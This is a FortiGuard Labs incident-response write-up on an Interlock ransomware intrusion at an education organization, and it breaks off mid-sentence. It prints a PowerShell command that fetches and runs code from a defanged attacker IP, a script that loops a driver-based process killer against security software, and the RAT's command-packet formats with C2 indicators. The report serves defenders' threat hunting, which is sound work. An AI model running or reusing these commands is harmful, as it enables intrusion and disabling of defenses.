{ "id": "3c24cb02-dcbd-4a92-88e6-3753fdba1bbc", "created_at": "2026-04-06T00:11:00.909968Z", "updated_at": "2026-04-10T03:36:47.901888Z", "deleted_at": null, "sha1_hash": "4077be8fa0679f7b8ed925e39a78ca41b5b35dbe", "title": "Interlock Ransomware: New Techniques, Same Old Tricks | FortiGuard Labs", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 5980469, "plain_text": "Interlock Ransomware: New Techniques, Same Old Tricks | FortiGuard\r\nLabs\r\nPublished: 2026-01-29 · Archived: 2026-04-05 15:32:06 UTC\r\nAffected Platforms: North American Organizations – Education Sector\r\nThreat Type: Financially Motivated (Ransomware)\r\nImpact: Data Theft and Encryption, Extortion\r\nSeverity Level: Moderate\r\nExecutive Summary\r\nThe Interlock ransomware group continues to compromise organizations worldwide, with a focus on UK- and US-based\r\norganizations, particularly in the education sector. The FortiGuard Incident Response team continues to track the fallout of\r\nprevious campaigns related to this group. Unlike other current key ransomware threats, the Interlock group is unique in that\r\nit does not operate under the RaaS model. Instead, they appear to be a smaller, dedicated group of operators who develop\r\nand operate their own malware to support most of their kill chain. The Interlock ransomware group has demonstrated the\r\nability to adapt its techniques and tooling over time as mitigations evolve.\r\nThis blog outlines a recent intrusion involving this group and highlights the importance of organizations conducting regular\r\nthreat hunting to identify ongoing intrusions. Indicators associated with the early stage of this intrusion directly correlate\r\nwith those from a campaign reported by the eSentire Threat Response Unit in July this year, and with parts of the Interlock\r\nmalware ecosystem previously reported by Mandiant. Information from our investigation highlights new indicators that\r\norganizations should hunt for as this adversary continues to adapt its tooling.\r\nAs part of these adaptations, our analysis identified a novel process-killing tool developed by the group that leverages a\r\nzero-day vulnerability in a gaming anti-cheat driver. In this case, the tool was used to attempt to disable the victim’s EDR\r\nand AV tools.\r\nIntrusion Timeline\r\nThe following timeline outlines the broad stages of this intrusion, which are unpacked in greater detail in subsequent\r\nsections.\r\nIntrusion Details\r\nPhase One – Initial Access – 31 March 2025\r\nThe victim in this investigation was a North American-based education organization. Initial access to the victim’s\r\nenvironment was assessed as originating from a MintLoader infection, based on distinct PowerShell activity on an end\r\nuser’s laptop on 31 March 2025. The victim user did not have an EDR tool installed at the time of infection. The associated\r\nPowerShell command is shown below in Figure 1.\r\npowershell -w h -c \"iex $(irm 138[.]199[.]156[.]22:8080/$($z = [datetime] :: UtcNow; $y = ([datetime]( '01/01/' + '1970'));\r\n$x = ($z - $y).TotalSeconds; $w = [math]: :Floor($x); $v = $w - ($w % 16); [int64]$v))\"\\1\r\nFigure 1: PowerShell command associated with initial compromise. Note IP has been defanged.\r\nhttps://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks\r\nPage 1 of 24\n\nOn execution, this script retrieves and executes a retrieved PowerShell payload from the URL\r\n‘138[.]199.156.22:8080/\u003ctime_since_epoch\u003e’. The URL structure associated with this script has previously been linked to a\r\nTAG-124 driven MintLoader campaign active at the time of this observed activity, and the command structure matches\r\nPowerShell scripts observed by Arctic Wolf in relation to other Interlock ransomware intrusions. Interlock ransomware\r\noperators have previously leveraged TAG-124 TDS infrastructure to identify and target victims across North America.\r\nAfter executing the above command, a zip file (download.zip) was created on the victim’s endpoint that contained a\r\nlegitimate Node.js runtime (node.exe). It was used to execute a malicious JavaScript payload (j1wp4vw8.log, SHA1:\r\n63FD5E0811C0BCC7DF9FC3D712F39F829A8D6FF0). Analysis of the associated process chains and the JavaScript\r\npayload aligns with previous reporting by Mandiant, which appears to track this payload as an early version of\r\nCORNFLAKE, and by Quorum, which tracks this payload as NodeSnakeRAT.B. We refer to this malware family as\r\nNodeSnakeRAT throughout this article. As part of its operation, this malware writes many of its payloads to disk. The\r\nFortiGuard IR team retrieved those payloads listed in Table 1 below. Note that not all payloads executed through this\r\nimplant produce on-disk artifacts, so this is not a complete view of the operators’ activities, but it does provide some insight\r\ninto their operations.\r\nFunction\r\nFile \r\nName\r\nFile Path SHA1 Hash Embedded C2\r\nFirst\r\nObserved\r\nNodeSnakeRAT\r\nj1wp4v\r\nw8.log\r\nC:\\Users\u003cvictim_\r\nuser\u0026gt;\\AppData\\\r\nRoaming\\ node-v22.11.0-winx64\\\r\nj1wp4vw8.log\r\n63FD5E0811C0\r\nBCC7DF9FC3D\r\n712F39F829A8\r\nD6FF0\r\n216[.]245.184.181\r\n212[.]237.217.182\r\n168[.]119.96.41\r\nsuffering-arnold-satisfaction-prior[.] trycloudflare.com\r\nspeak-head-somebody-stays[.]trycloudflare.com\r\nmortgage-i-concrete-origins[.]trycloudflare.com\r\nuna-idol-ta-missile[.]trycloudflare.com\r\nstrain-brighton-focused-kw[.]trycloudflare.com\r\nmusicians-implied-less-model[.]trycloudflare.com\r\n31-March\r\n-2025\r\nInterlockRAT\r\nk4myl\r\ne3i.dll\r\nC:\\Users\u003cvictim_\r\nuser\u003e\\AppData\\\r\nRoaming\\3o55f\r\nai8\\k4myle3i.dll\r\n6445E5CE51DA\r\n03934395ABB5\r\n411D3200D12E\r\nD7B3\r\n45[.]61.136.109\r\n128[.]140.120.188\r\n177[.]136.225.135\r\n21-April\r\n-2025\r\nNodeSnakeRAT 05x3a\r\nay1.log\r\nC:\\Users\u003cvictim\r\n_user\u003e\\AppData\\\r\nRoaming\\ node-v22.11.0-winx64\\\r\n05x3aay1.log\r\n677151B9864F\r\n8D01DE3C1557\r\nB1402AF7EF99\r\nAE3D\r\n37[.]27.216.30\r\n66[.]85.173.36\r\n146[.]70.79.43\r\nnedy-throwing-knock-whats[.]trycloudflare[.]com\r\noclc-publishing-individual-maps[.]trycloudflare[.]com\r\ncf1-winows-ww[.]com\r\ntime-syncmicrosoft[.]com\r\nmicrosoft-iplcloud[.]com\r\nsublime-tragedy-counties-sculpture[.]trycloudflare[.]com\r\nchampagne-businesses-hand-theta[.]trycloudflare[.]com\r\nassets-msnds[.]org\r\n22-May\r\n-2025\r\nhttps://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks\r\nPage 2 of 24\n\nsettings-win-datamicrosoft[.]org\r\nsettings-datamicrosoft[.]org\r\nperiodic-priest-games-assessed[.]trycloudflare[.]com\r\nuncertainty-por-bubble-persian[.]trycloudflare[.]com\r\neventsdatamicrosoft[.]org\r\ndns-teams-windows[.]live\r\nsync-time-win[.]live\r\nG-zip archive\r\nthat contains\r\nJava\r\nenvironment\r\nand internal\r\nJavaScript file\r\n‘jucheck.jar’\r\n9gesu\r\n23g.log\r\nC:\\Users\u003cvictim\r\n_user\u003e\\AppData\\\r\nRoaming\\ywgomm\r\n2t\\9gesu 23g.log\r\nF381C897A54\r\nB1A0A41D41F\r\n279ABA1B7C1\r\n3E3F901\r\nn/a\r\n24-June\r\n-2025\r\nInterlockRAT\r\naqwsx\r\nvvz.log\r\nC:\\Users\u003cvictim_\r\nuser\u003e\\AppData\\\r\nRoaming\\dji8zg3d\\\r\naqwsxvvz.log\r\nF3C2BDB448\r\n4F66213556B\r\n2CD5F114CE4\r\nF4A9DD 86\r\n157[.]250.195.229\r\n216[.]219.95.234\r\n91[.]98.29.99\r\n04-\r\nSeptember-2025\r\nInterlockRAT\r\ng86oo\r\nfvm.dll\r\nC:\\Users\u003cvictim_\r\nuser\u003e\\AppData\\\r\nRoaming\\ ro5ry\r\nxiu\\g86oofvm.dll\r\nF3C2BDB4484\r\nF66213556B2C\r\nD5F114CE4F4A\r\n9DD86\r\n157[.]250.195.229\r\n216[.]219.95.234\r\n91[.]98.29.99\r\n04-\r\nSeptember-2025\r\nTable 1: Payloads dropped through NodeSnakeRAT implant on patient zero throughout intrusion.\r\nUsing the victim’s profile, an autorun entry ‘ChromeUpdater’ was created to establish persistence for NodeSnakeRAT on 31\r\nMarch 2025. It was later updated to include the newer NodeSnakeRAT payloads.\r\nOn April 3, 2025, three days after initial execution of the first NodeSnakeRAT implant (j1wp4vw8.log SHA1 -\r\n63FD5E0811C0BCC7DF9FC3D712F39F829A8D6FF0) on patient zero, a single, brief RDP connection was made from a\r\ntemporarily assigned IP within the victim’s environment to the main victim file server using a default Administrator account\r\nnot actively used by the victim’s organization. On April 21, 2025, the adversary leveraged their NodeSnakeRAT access to\r\nexecute a second JavaScript implant (k4myle3i.dll SHA1 - 6445E5CE51DA03934395ABB5411D3200D12ED7B3), which\r\nis an earlier iteration of Interlock RAT also tracked by Mandiant as WINDYTWIST.SEA and eSentire as Interlock\r\nBackdoor.\r\nBased on available evidence, the threat actor did not perform any significant activity for several months after the initial\r\ninfection. The next significant activity occurred on September 5, 2025, following the rotation of their infrastructure on\r\nSeptember 4, 2025, as shown in Table 1 above. The affected endpoint was an individual user’s laptop that was rarely\r\nattached to the victim’s corporate network. FortiGuard IR assessed that it is probably why the adversary was unable to\r\nlaterally move from this beachhead for several months because the timeframes during which the affected endpoint was\r\nconnected to the corporate environment did not overlap with the adversary's operating window.\r\nPhase Two – Data Access and Exfiltration – 05-15 September 2025\r\nThe next stage of this intrusion began on September 5, 2025, when the victim’s MDR service detected a similar\r\nNodeSnakeRAT infection chain on another application server in the victim’s environment. Given that the affected endpoint\r\nis an internal application server, the absence of evidence of MintLoader or other initial access methods, and the use of the\r\nsame NodeJS and subsequent JavaScript files, this phase was assessed as a continuation of the previous intrusion. Using this\r\nexisting access, the adversary delivered another Interlock RAT implant as a .log file (node.log; SHA1:\r\n2D5F88C396553669BD50183644D77AD3C71D72BB) that included new hardcoded infrastructure.\r\nAnalysis of Interlock RAT Implant \r\nThis second Interlock RAT payload is also obfuscated JavaScript. It contains more than 130 constant strings obtained\r\ndynamically by calling a string function with a unique ID at runtime. This technique inhibits complete static analysis and\r\nhttps://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks\r\nPage 3 of 24\n\nlimits the effectiveness of some string-based detection mechanisms. In the case of this payload, the function  ‘a0n()’ is used\r\nto retrieve the constant strings by their ID. However, other publicly available samples indicate these function values are not\r\nconsistent and are likely randomized as part of each build. ‘const Y = a0n;’ indicates Y is a\r\nreference to the a0n() function. For clarity, code snippets in this section show resolved strings, making the code logic easier\r\nto understand. Error! Reference source not found. below demonstrates how the code leverages these dynamic strings. \r\nFigure 2: Code snippet using dynamic strings\r\nUpon execution, the payload collects system information from the victim’s device by executing the ‘systeminfo’ command\r\nthrough PowerShell. The harvested information includes the current user’s permissions (such as whether they are a user,\r\nadmin, or system), the domain, computer name, current username, and Windows versions. Figure 3 below shows a sample of\r\nthe collected information.\r\nFigure 3: Systeminfo is called to collect basic system information when the payload is first executed.\r\nAfter collecting system information, the malware sends it in plaintext to one of the C2 servers, as shown in Figure 4. This\r\npayload defines three hardcoded C2 server IPs in the payload, which are ‘157[.]250.195.229’, ‘216[.]219.95.234’ and\r\n‘64[.]190.113.235’. Two of them are obtained through the dynamic string function by their IDs. This is noted because not all\r\nC2 IPs can be obtained through static analysis. The server port is hardcoded to 443 for all identified C2 servers. \r\nFigure 4: Packet with sample of collected system information sent to hardcoded C2 IP during testing.\r\nThe first four bytes of this C2 traffic are a magic value (0xDF691155). The subsequent bytes contain the collected\r\ninformation in JSON format. The ‘iptarget’ field specifies the C2 server to which the data is sent. This first packet is\r\nhighlighted in detail because it is not encrypted, providing detection opportunities; subsequent packets are encrypted by the\r\npayload’s private encryption function. Each packet consists of two parts: a message header and message data (the command\r\ndata). The message header is XOR-encrypted with a constant key (0x4D in this payload), and the plain text message\r\nheader (0x0C in size) has the following layout:\r\nOffset Size Content\r\nhttps://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks\r\nPage 4 of 24\n\n+00 2 Command Type\r\n+04 2 Thread ID. The shell, command, socks5 features are handled by threads.\r\n+06 4 Size of the message data\r\n+08 4 Key to encrypt/decrypt the message data\r\nTable 2: Structure and contents of the message header.\r\nWhile the running implant established a connection with the C2 server, the payload keeps the connection alive by sending a\r\nheartbeat packet on a timer (approximately every minute). The command type for such a packet is 0x1 (VOID). \r\n The implant supports multiple command types, each providing additional functionality to support adversaries’ operations.\r\nTable 3 below lists all commands provided by this RAT sample. We provide additional information related to the SOCKS5,\r\nCONSOLE, and CONSOLE_ONE_COMMAND command types below.\r\nCommand Type Description\r\n00 SOCKS5\r\n01 VOID\r\n02 DISCONNECT\r\n03 CONSOLE\r\n04 OFF\r\n05 DELETE\r\n06 NEW_LAYING\r\n07 MV_LAYING\r\n08 SLEEP\r\n09 CONSOLE_ONE_COMMAND\r\nTable 3: Command matrix for Interlock RAT sample observed in this intrusion.\r\nSOCKS5 Proxy\r\nThe command type for SOCKS5 proxy is 0x00, the thread id is 0xffff, and the randomly generated key. The following is a\r\nplaintext example of a complete SOCKS5 command (message header + message body):\r\nMessage Header   Message Body\r\n\\x00\\x00 \\xff\\xff \\x0f\\x00\\x00\\x00 \\x11\\x22\\x33\\x44\r\n+\r\n\\x00\\x00\\x00 \\x01 \\x08\\x09\\x0a\\x0b \\x33\\x33\r\n1 2 3 4 5 6 7 8\r\nMessage Header Breakdown   Message Body Breakdown\r\n  Value Function     Value Function\r\n1 x00\\x00 SOCKS5 command type   5 \\x00\\x00\\x00 Undefined\r\n2 \\xff\\xff\r\nThread Id (0xffff is\r\nundefined)\r\n  6 \\x01\r\nSOCKS5 server type flag\r\n1 for IP\r\n3 for domain\r\n3 \\x0f\\x00\\x00\\x00 Message body size   7 \\x08\\x09\\x0a\\x0b\r\nSOCKS5 server value – in this\r\nexample ‘8.9.10.11’\r\n4 \\x11\\x22\\x33\\x44\r\nKey to encrypt message\r\nbody (random)\r\n  8 \\x33\\x33\r\nTCP port for SOCKS5\r\nconnection\r\nUpon receiving the above sample command, the implant establishes a network connection to the operator-provided IP and\r\nport to provide SOCKS5 proxy service (note the IP and port in the above table are sample values). Figure 5 shows the\r\ncaptured SOCKS5 command from our controlled environment.\r\nhttps://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks\r\nPage 5 of 24\n\nFigure 5: Captured command packet for SOCKS5.\r\nCONSOLE \r\nThe command type for CONSOLE is 0x03. It is used to establish a remote interactive shell between the C2 server and the\r\nvictim’s device. The command packet requires only the message header and ignores any message body data. Below is an\r\nexample of such a packet: \r\nMessage Header   Message Body (ignored for console command)\r\n\\x03\\x00 \\xff\\xff \\x00\\x00\\x00\\x00 \\x00\\x00\\x00\\x00\r\n+\r\n- - - -\r\n1 2 3 4 - - - -\r\nOnce the remote shell is established, the attacker can execute any Windows commands directly through the interactive shell. \r\nCONSOLE_ONE_COMMAND\r\nUsing this command, the attacker can execute Windows commands and receive their results. Below is a plaintext packet\r\nexample for executing the ‘dir c:\\’ command.\r\nMessage Header   Message Body\r\n\\x09\\x00 \\xff\\xff \\x08\\x00\\x00\\x00 \\x11\\x22\\x33\\x44\r\n+\r\n\\x64\\x69\\x72\\x20\\x43\\x3a\\x5c\\x5c\r\n1 2\u003c 3 4 5\r\nMessage Header Breakdown   Message Body Breakdown\r\n  Value Function     Value Function\r\n1 \\x00\\x00 SOCKS5 command type   5\r\n\\x64\\x69\\x72\\x20\\\r\nx43\\x3a\\x5c\\x5c\r\nCommand to be executed, in\r\nthis case ‘dir C:\\\\’\r\n2 \\xff\\xff\r\nThread Id (0xffff is\r\nundefined)\r\n \r\n3 \\x0f\\x00\\x00\\x00 Message body size  \r\n4 \\x11\\x22\\x33\\x44\r\nKey to encrypt message\r\nbody (random)\r\n \r\nFigure 6: An encrypted command packet and the corresponding response packet of the ‘dir C:\\\\’ command, which are both\r\nencrypted.\r\nSeveral instances of the Interlock RAT were deployed throughout this intrusion across several hosts. Details of the identified\r\nsamples are shown in Table 4 below, along with their C2 IP addresses to support hunting efforts.\r\nhttps://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks\r\nPage 6 of 24\n\nFile Name File Path SHA1 Hash Embedded C2\r\nFirst\r\nObserved\r\nk4myle3i.dll\r\nC:\\Users\\\r\n\u003cvictim_user\u003e\\AppData\\Roaming\\\r\n3o55fai8\\k4myle3i.dll\r\n6445E5CE51DA03934395\r\nABB5411D3200D12ED7B3\r\n45[.]61.136.109\r\n128[.]140.120.188\r\n177[.]136.225.135\r\n21 April\r\n2025\r\naqwsxvvz.log\r\nC:\\Users\\\\AppData\\ Roaming\\\r\ndji8zg3d\\aqwsxvvz.log\r\nF3C2BDB4484F66213556\r\nB2CD5F114CE4F4A9DD86\r\n157[.]250.195.229\r\n216[.]219.95.234\r\n64[.]190.113.235\r\n04\r\nSeptember\r\n2025\r\ng86oofvm.dll\r\nC:\\Users\\\r\n\u003cvictim_user\u003e\\AppData\\Roaming\\\r\nro5ryxiu\\g86oofvm.dll\r\nF3C2BDB4484F66213556\r\nB2CD5F114CE4F4A9DD86\r\n157[.]250.195.229\r\n216[.]219.95.234\r\n64[.]190.113.235\r\n04\r\nSeptember\r\n2025\r\nnode.log\r\nC:\\Users\\\u003cvictim_user\u003e\\AppData\\\r\nRoaming\\\r\nnode-v22.11.0-win-x64\\node.log\r\n2D5F88C396553669BD50\r\n183644D77AD3C71D72BB\r\n157[.]250.195.229\r\n216[.]219.95.234\r\n64[.]190.113.235\r\n05\r\nSeptember\r\n2025\r\nTable 4: Interlock RAT C2 IPs extracted from identified samples.\r\nPersistence for these later-stage Interlock RAT implants was established using scheduled tasks. The scheduled task names\r\nused throughout this intrusion include ‘\\Microsoft\\Windows\\Defrag\\ScheduledDefrags’,\r\n‘\\Microsoft\\Windows\\Chkdsk\\TempDefrag’, ‘\\TimeSyncDrive’, ‘\\TimeSyncroDriver’, ‘\\TimeSync’, and ‘\\TimeSyncro’.\r\nUsing their Interlock RAT implants again, the adversary then began performing system discovery and enumeration. This was\r\nperformed using a PowerShell script (1.ps1) placed on the victim’s domain controller in an accessible share named\r\n‘Microsoft’. The script employs numerous forms of static obfuscation. A snippet is shown in Figure 7.\r\nFigure 7: Obfuscated PowerShell script (1.ps1) used for system discovery and enumeration across the victim’s environment.\r\nScreenConnect installation\r\nOn 13 September 2025, the adversary made a change to the tooling and began installing ScreenConnect. Installation was\r\nperformed using an MSI file (support.msi), which was likely created with Advanced Installer, based on the signature\r\ncommand structure identified after execution (see Figure 8 below).\r\nFigure 8: Anomalous PowerShell command structure typically indicative of the use of an MSI installer generated by\r\nAdvanced Installer.\r\nThis technique was employed across several user workstations and was operated effectively until at least October 9, 2025.\r\nDetails from the installation identified that the ScreenConnect service was configured to interact with the C2 domain\r\nhttps://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks\r\nPage 7 of 24\n\n‘user[.]kangaroosim[.]com’ which resolved to IP  91[.]92.241.179 at the time of infection. FortiGuard threat intelligence\r\nindicates that this is a known C2 domain associated with ScreenConnect usage, as shown in Figure 9.\r\nFigure 9: FortiGuard Threat Intelligence details related to the ScreenConnect C2 domain associated with the intrusion.\r\nFortiGuard IR assessed that this change in TTPs was likely, because the adversary appeared more comfortable using the GUI\r\nto perform subsequent data exfiltration, and the victim's EDR tooling was impeding the adversary’s ability to consistently\r\nadvance their intrusion. Anomalous use of remote desktop tools, such as ScreenConnect, offers high-confidence detection\r\nopportunities and should be a focus for defenders seeking to mitigate ransomware-related threats.\r\nUsing this access, the adversary added an allow rule to the victim’s firewall for RDP via netsh.exe, via an interactive\r\nPowerShell window. Continuing to use their ScreenConnect access, the adversary was observed extensively browsing for\r\nkey files across compromised endpoints and victim file servers during September 14 and 15.\r\nOn September 15, the adversary interacted with a compromised user workstation via ScreenConnect and used RDP to\r\nestablish a session with the victim’s primary file server. During this session, the adversary created a copy of the AZcopy\r\nexecutable (win64.exe; SHA1: BE39DBADFC9CFC494F1B7BF3A04E49C336E0FA0D). AZcopy is an open-source\r\ncommand-line utility to support file upload to an Azure storage bucket and was used by the adversary to exfiltrate more than\r\n250GB of data from the victim’s file server. The use of this tooling for data exfiltration aligns with Cisco Talos reporting on\r\nInterlock ransomware activity from November 2024, further demonstrating consistency in its TTPs. This event was the only\r\nbulk exfiltration observed throughout this intrusion.\r\nPhase Three – Ransomware Preparation and Deployment – 16 September – 12 October 2025\r\nThere was a significant gap between when most of the data was exfiltrated from the victim’s network and when the threat\r\nactor began deploying ransomware across the victims’ endpoints. What’s also notable about these observations is that no\r\nadditional data exfiltration was observed following the significant AZcopy exfiltration. At this stage, FortiGuard assessed\r\nthat the ransomware operators had determined that extorting the victim’s data would not provide sufficient incentive for the\r\nvictim to pay the ransom, so they reverted to encryption to achieve this outcome.\r\nMost other ransomware operators we see typically use the double-extortion method up front, so this approach is anomalous.\r\nIn this intrusion, there were two different types of ransomware payloads: one to target Windows endpoints that was\r\nimplemented as a JavaScript file (jar.jar SHA1 - AD77FBDBB2FCBDB440428EED3E76D106E1119FCF), and a second\r\nthat was used to target the victim’s Nutanix hypervisor implemented as an ELF binary (script SHA1 -\r\nF5C6BD4E9686AFB0C4E7C1C1733FEBB4065D514F).\r\nThis transfer to ransomware deployment kicked off on 10 October 2025 when the adversary laterally moved to the victim’s\r\nNutanix system via SSH using an existing administrator account. Using their access, the adversary identified logical disks\r\nand then transferred an ELF binary (script SHA1 - F5C6BD4E9686AFB0C4E7C1C1733FEBB4065D514F) believed to be a\r\nLinux implementation of Interlock ransomware. This binary was executed using the ‘setsid’ command to encrypt each\r\nidentified drive using the commands shown below in Figure 10.\r\nhttps://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks\r\nPage 8 of 24\n\nFigure 10: Command history associated with Interlock operator encrypting drives on victims Nutanix server using Interlock\r\nransomware (script) and then validating encryption.\r\nFollowing this activity, the adversary logged into the victim’s Prism Central server and verified that the logical disks had\r\nbeen encrypted with the ‘.!nt3rlock’ file extension, and that the corresponding ransom note had been placed. A screenshot of\r\nthe associated ransom note is shown in Figure 11 below.\r\nFigure 11: Ransom note placed on an encrypted Nutanix server following encryption of all attached logical disks.\r\nThis initial encryption activity was followed by extensive enumeration of the victim’s Windows environment via RDP and\r\ninteractive PowerShell. The adversary used several LOLbins in their interactive PowerShell sessions, as shown in Figure 12,\r\nto collect and validate credentials, verify connectivity to key servers that would later be targeted by the ransomware, and\r\nuninstall/disable defender software, namely FortiClient and FortiEDR.\r\nFigure 12: Commands executed via RDP access as part of ransomware preparation activity.\r\nThe final three commands are notable. The third last ‘appwiz’ is a shortcut to the program and features a component of\r\nWindows control panel that can be used to install and uninstall programs from the victim’s endpoint. In the context of\r\nsubsequent commands, FortiGuard IR suspected the adversary attempted to identify security software using this\r\nfunctionality. Following this activity, the adversary attempted to execute the following PowerShell command.\r\n$progPath = \".\\polers.dll\";\r\n$prc = \"Forti*\";\r\n$fPath = \"C:\\windows\\system32\\rundll32.exe\";\r\n$pArgs = $progPath + \" start \" + $prc;\r\n$delayS = 10\r\nif (-not (Test-Path $fPath)) {\r\n     exit 1;\r\n};\r\n$global:RunningProcs = @();\r\nfunction cl-p {\r\n     $global:RunningProcs = @(foreach ($p in $global:RunningProcs) {\r\n          if (Get-Process -Id $p.Id -ErrorAction SilentlyContinue) {\r\nhttps://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks\r\nPage 9 of 24\n\n$p;\r\n          }\r\n     } )\r\n};\r\nwhile ($true) {\r\n     cl-p;\r\n     while ($global:RunningProcs.Count -ge 5) {\r\n          sleep 1; cl-p;\r\n      };\r\n     $proc= Start-Process -FilePath $fPath -Arg $pArgs -PassThru;\r\n     $global:RunningProcs = @($global:RunningProcs + $proc);\r\n     sleep $delays;\r\n};\r\nFigure 13: PowerShell commands used to execute the EDR bypass tool ‘Hotta Killer’. Note that these have been reformatted\r\nfor readability.\r\nThe series of commands above ultimately executes the ‘polers.dll’ DLL via proxy execution via rundll32.exe and ensures\r\nthat at least five instances of the process are running before entering a loop of one-second sleeps. This series of commands\r\neffectively functions as a watchdog, ensuring that the process is always running. The process results in the following\r\ncommand line arguments:\r\nC:\\windows\\system32\\rundll32.exe .\\polers.dll start Forti*\r\nThe first attempt at this command failed because the operator was not in the correct directory to access the DLL, hence the\r\ncd command and duplicate command executions. Analysis of this DLL (polers.dll, SHA1:\r\n3B9B2D5934F9ED1E3A000A760A6FA90422E8A555) identifies it as a new bring-your-own-vulnerable-driver (BYOVD)\r\nprocess-killer tool.\r\nHotta Killer malware code analysis\r\nUpon execution of the Hotta Killer (polers.dll), a separate payload DLL file is extracted and dropped into memory,\r\noverriding the current code of polers.dll. This dynamic loading technique is common across the malware samples used by\r\nthe Interlock operator throughout this intrusion and, as noted earlier, is an effective anti-static analysis technique. The\r\nfollowing analysis is based entirely on the dynamically extracted payload DLL, which we refer to as ‘Hotta Killer’.\r\nAfter dynamic loading, the malware drops a kernel driver from memory into the current directory (‘E:\\’ in our testing). The\r\ndriver file is named ‘UpdateCheckerX64.sys’ with SHA1 - 7556AE58C215B8245A43F764F0676C7A8F0FDD1A. This\r\ndriver is a signed x64 native system driver and is a renamed version of an anti-cheat driver originally named\r\n‘GameDriverx64.sys’, vulnerable to CVE-2025-61155.\r\nTo install and start the system driver, it calls several native Windows APIs, including OpenSCManagerW(),\r\nCreateServiceW(), OpenServiceW() and StartServiceW().\r\nThe CreateServiceW() function is called with the following main parameters\r\nPara Names Values\r\nlpServiceName ‘UpdateCheckerX64_{random-numbers}’\r\nlpDisplayName ‘UpdateCheckerX64_{random-numbers}’\r\nlpBinaryPathName ‘E:\\UpdateCheckerX64.sys’\r\ndwServiceType 1, for “SERVICE_KERNEL_DRIVER”\r\ndwStartType 3, for “SERVICE_DEMAND_START”\r\nThe dwServiceType is set to 1 (SERVICE_KERNEL_DRIVER), indicating it’s a kernel driver. As a result, it does not\r\nappear in the system Services but instead in the system registry. Figure 14 shows the newly installed driver with the service\r\nname ‘UpdateCheckerX64_1763677393’.\r\nhttps://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks\r\nPage 10 of 24\n\nFigure 14: Installed kernel driver in the system registry.\r\nFollowing installation of the service driver, the payload DLL calls the CommandLineToArgvW() API to obtain the argument\r\n‘Forti*’ provided as command line input, which is subsequently formatted as ‘Forti*.exe’. Then, the payload DLL searches\r\namong the currently running processes for any process whose name matches the ‘Forti*.exe’ pattern using several Windows\r\nnative APIs, including CreateToolhelp32Snapshot(), Process32NextW() and Process32FirstW().\r\nAfter the malware retrieves the PID of a process matching the search pattern, it passes the PID to the loaded service driver\r\nthrough a created symbolic link, “\\\\\\\\.\\\\HtAntiCheatDriver”. It then calls the DeviceIoControl() API and places the obtained\r\nPID in the inBuffer parameter to attempt to kill the process linked to the provided PID. Figure 15 below depicts the pseudo\r\ncode in C that outlines key points of this process.\r\nFigure 15: Pseudo code shows mechanism used to send a target PID to the driver.\r\n\\When the service driver starts, its DriverEntry(), function is called, which creates a ‘device’ and a symbolic link. To achieve\r\nthis, IoCreateDevice() is called with the DeviceName set to ‘\\\\Device\\\\HtAntiCheatDriver,’ and IoCreateSymbolicLink(), is\r\ncalled with the SymbolicLinkName set to ‘\\\\??\\\\HtAntiCheatDriver’. Once this link is established, the payload DLL can\r\ncommunicate with the driver through it. Next, the driver sets a callback function to the\r\nIRP_MJ_DEVICE_CONTROL major function, so that it is invoked automatically when the data is received. The callback\r\nfunction reads the IoControlCode and checks whether the code is 0x222040 (see Figure 16 below). It continues to verify the\r\nflag is 0xFA123456. If both checks pass, the function proceeds to read the PID from the input buffer and then calls the\r\nnative API, ZwTerminateProcess(), to terminate the process.\r\nhttps://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks\r\nPage 11 of 24\n\nFigure 16:-ZwTerminateProcess() is called to kill a ‘Forti*.exe’ process specified by a provided PID sent to the buffer\r\nattached to symbolic link ‘\\\\??\\\\HtAntiCheatDriver’.\r\nAlthough it could be framed as a ‘novel EDR bypass tool’, Hotta Killer is more accurately considered an ‘elevated process\r\nkiller’ tool that in this case, was used by the Interlock ransomware operator(s) to attempt to evade defenses by targeting\r\nFortinet security software. In this intrusion, the attempts to leverage this tool by using a nested loop didn’t affect the\r\noperation of the installed Fortinet software.\r\nDrivers related to anti-cheat software in video games have historically been leveraged by ransomware operators for the same\r\noutcome. Organizations should look to incorporate threat intelligence related to new tooling involving Bring Your Own\r\nVulnerable Driver (BYOVD) quickly into their security tooling to minimize the effectiveness of these tools and to create\r\ndetection opportunities.\r\nFollowing this attack, the adversary began encrypting victim endpoints using their ransomware. The initial deployment of\r\nthis ransomware was performed interactively via the adversaries’ ScreenConnect and RDP sessions using PowerShell ISE.\r\nFortiGuard IR determined that this initial deployment was performed to validate the deployment commands that would later\r\nbe incorporated into a PowerShell script to deploy ransomware more widely.\r\nJavaScript Ransomware (jar.jar) code analysis\r\nThe primary impact for this victim was through a malicious JavaScript file (jar.jar SHA1 -\r\nAD77FBDBB2FCBDB440428EED3E76D106E1119FCF) that was used to encrypt files on Windows endpoints across the\r\nvictim’s environment. Note that the adversary used multiple files with this same name throughout the intrusion and this\r\nnaming convention has been linked to previous Interlock ransomware activity. The implemented JavaScript ransomware\r\nemploys multi-threading to encrypt files on a victim's machine as quickly as possible. There is no command and control\r\n(C2) server communication present in the code. The malware operates autonomously using a hardcoded RSA public key,\r\nmeaning it does not need to contact a server to begin encryption.\r\nThe first function of the script ‘reme’, sets up an obfuscated PowerShell command to delete the .jar file upon exit.\r\nFigure 17: ‘reme’ function used to support self-deletion of the JavaScript file on execution.\r\nhttps://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks\r\nPage 12 of 24\n\nThis function sets up a ShutdownHook to run when the program terminates. It also decodes and pieces together a\r\nPowerShell command ‘powershell.exe -Command sleep 5 ; rm '\u003cpath_to_jar\u003e'’. This command waits five seconds and then\r\nforcibly removes the malware file, hindering analysis.\r\nThe second function in the script ‘lp’, recursively finds files within the 